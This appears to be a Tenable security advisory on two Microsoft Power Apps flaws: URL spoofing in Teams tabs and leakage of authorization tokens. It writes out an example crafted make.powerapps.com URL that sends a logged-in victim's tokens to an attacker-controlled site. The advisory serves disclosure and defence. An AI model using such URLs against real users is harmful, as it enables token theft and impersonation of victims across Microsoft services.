Multiple vulnerabilities in Microsoft Power Apps (apps.powerapps.com, make.powerapps.com)
MediumSynopsis
Insufficient input validation on apps.powerapps.com/teams/makerportal makerportalUrl parameter
The makerPortalUrl parameter at apps.powerapps.com/teams/makerportal did not properly validate the supplied url.
A malicious attacker could leverage this issue to spoof content in Microsoft Teams tabs and steal victims' authorization tokens.
Theft of authorization tokens for graph.make.powerapps.com and api.powerapps.com
If a user who is logged into make.powerapps.com was convinced to visit a page following the format:
https://make.powerapps.com/teams/powerapps/acquire/mscrm.test/status/https%3a%2f%2f<attacker-controlled-site>
That user's authorization tokens for graph.make.powerapps.com and api.powerapps.com would be leaked to the attacker-controlled site.
A malicious attacker could leverage this issue to steal additional authorization tokens and make requests to multiple Microsoft services authorized as the victim.
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Risk Information
Evan Grant
Microsoft Power Apps
Microsoft Teams
Medium